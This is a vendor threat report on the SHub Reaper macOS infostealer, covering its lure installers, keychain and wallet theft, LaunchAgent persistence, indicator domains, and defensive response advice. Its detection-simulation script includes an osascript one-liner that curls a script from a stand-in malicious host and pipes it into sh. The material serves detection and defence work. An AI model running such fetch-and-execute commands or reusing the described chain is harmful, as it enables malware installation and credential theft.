SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain

SOC Prime Team

SHub Reaper | macOS Stealer Spoofs Apple, Google, and Microsoft in a Single Attack Chain

Detection stack

AIDR
Alert
ETL
Query

Threat Report
Attack Flow
Detections
Simulations

Summary

The report analyzes a new macOS infostealer variant called SHub Reaper, which uses fake WeChat and Miro installers to deliver a malicious AppleScript payload through a typo-squatted Microsoft-themed domain. Once launched in Script Editor, the payload collects browser data, cryptocurrency wallet files, and keychain information, then exfiltrates the stolen content as chunked ZIP archives. The malware also tampers with wallet files and establishes persistence through a LaunchAgent disguised as a Google software update. Recommended detection focuses on AppleScript execution, suspicious LaunchAgent creation, and outbound traffic to the known command-and-control infrastructure.

Investigation

SentinelOne tracked the full multi-stage delivery chain, including abuse of the applescript:// scheme, dynamic generation of the AppleScript payload, and a file-grabbing module that mirrors the document theft behavior seen in AMOS. Researchers captured network traffic to the command-and-control domain hebsbsbzjsjshduxbs.xyz and related endpoints, along with creation of temporary files under /tmp and a LaunchAgent placed in the user’s Library directory. The investigation also uncovered hard-coded Telegram bot functionality used for operator telemetry.

Mitigation

Defenders should block access to the typo-squatted domains mlcrosoft.co.com, qq-0732gwh22.com, and mlroweb.com, and monitor for LaunchAgents created under paths that imitate Google update components. Application allow-listing should be used to restrict AppleScript execution from untrusted sources, and strict code-signing verification should be enforced. Network detections should also alert on communication with the identified command-and-control domain and its known API paths.

Response

If SHub Reaper activity is detected, isolate the affected endpoint immediately, terminate any suspicious AppleScript or LaunchAgent processes, and remove the malicious files from /tmp and the user Library. Investigators should then perform full forensic collection of browser data stores, wallet directories, and credential repositories, followed by credential resets where compromise is suspected. The identified command-and-control infrastructure should be blocked, and the incident response team should begin broader threat hunting across the environment.

"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef operator fill:#ff9900 %% Nodes u2013 Attack Steps step_initial_access["Technique – T1659 Content Injection: Compromised lure websites (fake WeChat or Miro) host malicious applescript:// URLs that deliver the payload"] class step_initial_access action step_execution["Technique – T1027 Obfuscated Files or Information: AppleScript opened in Script Editor runs a hidden base64u2011encoded curl call that decodes and executes the stager"] class step_execution action step_code_retrieval["Technique – T1505 Server Software Component: AppleScript downloads core malicious AppleScript from a remote server"] class step_code_retrieval action step_credential_capture["Technique – T1056 Input Capture: AppleScript prompts the user for a password and harvests Keychain data"] class step_credential_capture action step_data_collection["Technique – T1074.001 Local Data Staging: Filegrabber scans Desktop and Documents for target extensions and stages them in /tmp/shub_<rand>"] class step_data_collection action step_archive["Technique – T1560.001 Archive via Utility: Collected files are zipped and split into 70u202fMB chunks"] class step_archive action step_exfiltration["Technique – T1011 Exfiltration Over Other Network Medium: Chunks are uploaded via HTTPS to the commandu2011andu2011control server"] class step_exfiltration action step_wallet_hijack["Techniques – T1553.002 Code Signing and T1036.001 Masquerading: Malicious app.asar files replace legitimate wallet binaries, using adu2011hoc or invalid code signatures to bypass Gatekeeper"] class step_wallet_hijack action step_persistence["Techniques – T1037.002 Login Hook, T1176 Software Extensions and T1574.007 Path Interception: Fake Google Software Update directory with a LaunchAgent plist (com.google.keystone.agent.plist) placed in PATH to achieve persistent execution"] class step_persistence action step_backdoor["Technique – T1219 Remote Access Tools: LaunchAgent executes GoogleUpdate script every 60u202fs, beacons to /api/bot/heartbeat and can run additional commands"] class step_backdoor malware %% Nodes u2013 Tools / Components tool_applescript["Tool – Name: AppleScript Description: Script executed via Script Editor to decode and launch the payload"] class tool_applescript tool tool_curl["Tool – Name: curl Description: Used to download additional AppleScript and data files over HTTPS"] class tool_curl tool tool_launchagent["Tool – Name: LaunchAgent Description: macOS useru2011level persistence mechanism defined by a plist"] class tool_launchagent tool malware_stager["Malware – Name: Stager Description: Small loader that fetches the main AppleScript payload"] class malware_stager malware %% Edges u2013 Flow step_initial_access –>|leads to| step_execution step_execution –>|uses| tool_applescript step_execution –>|executes| malware_stager malware_stager –>|downloads via| tool_curl malware_stager –>|triggers| step_code_retrieval step_code_retrieval –>|uses| tool_curl step_code_retrieval –>|enables| step_credential_capture step_credential_capture –>|captures| step_data_collection step_data_collection –>|stages files for| step_archive step_archive –>|creates chunks for| step_exfiltration step_exfiltration –>|delivers to| step_wallet_hijack step_wallet_hijack –>|modifies| step_persistence step_persistence –>|installs| tool_launchagent tool_launchagent –>|provides| step_backdoor step_backdoor –>|acts as| malware_stager %% Class Assignments class step_initial_access,step_execution,step_code_retrieval,step_credential_capture,step_data_collection,step_archive,step_exfiltration,step_wallet_hijack,step_persistence,step_backdoor action class tool_applescript,tool_curl,tool_launchagent tool class malware_stager,step_backdoor malware "

Attack Flow

Attack Narrative & Commands:
The attacker crafts a concise one‑liner that leverages osascript to execute a shell command. Within the AppleScript, do shell script runs curl to download a remote shell script (payload.sh) and pipes it directly into sh for execution. Because the entire chain is embedded in a single AppleScript invocation, macOS logs a single process_creation event whose command line contains both osascript and curl, satisfying the detection rule.

Regression Test Script:

#!/bin/bash
#
# Simulate SHub Reaper execution on macOS
# Generates a single process_creation event containing both 'osascript' and 'curl'
#
MALICIOUS_URL="https://malicious.example.com/payload.sh"

# One‑liner: osascript runs a shell command that curls the payload and executes it
osascript -e "do shell script "curl -s ${MALICIOUS_URL} | sh""

Cleanup Commands:

#!/bin/bash
#
# Clean up any artefacts created by the simulation.
# The payload runs in memory and does not write files, but we ensure no lingering processes.
#
# Kill any stray 'sh' processes started by the test (use with caution on production systems)
pkill -f "sh -c curl -s https://malicious.example.com/payload.sh"

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free